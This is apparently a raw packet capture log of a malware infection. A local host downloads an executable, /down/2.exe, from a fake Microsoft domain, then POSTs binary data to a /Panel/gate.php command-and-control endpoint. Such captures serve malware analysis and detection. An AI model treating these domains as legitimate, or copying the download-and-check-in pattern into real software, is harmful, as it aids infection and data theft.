2016-10-23 00:47:05.000114 IP 192.168.1.102.58710 > 59.188.68.200.80: Flags [P.], seq 0:294, ack 1, win 256, length 294: HTTP: GET /down/2.exe HTTP/1.1
E..N..@……..f;.D..V.P……eRP…….GET /down/2.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: down.microsoftsup.com
Connection: Keep-Alive
—
E..(..@….]…f;.D..W.P.e\..1..P….^……..
2016-10-23 00:47:18.618290 IP 192.168.1.102.58711 > 59.188.68.200.80: Flags [P.], seq 0:272, ack 1, win 256, length 272: HTTP: POST /Panel/gate.php HTTP/1.0
E..8..@….L…f;.D..W.P.e\..1..P…R0..POST /Panel/gate.php HTTP/1.0
Host: a.microsoftsup.com
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 339
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
—
E..(..@….W…f;.D..X.P..b….bP………….
2016-10-23 00:47:20.056174 IP 192.168.1.102.58712 […]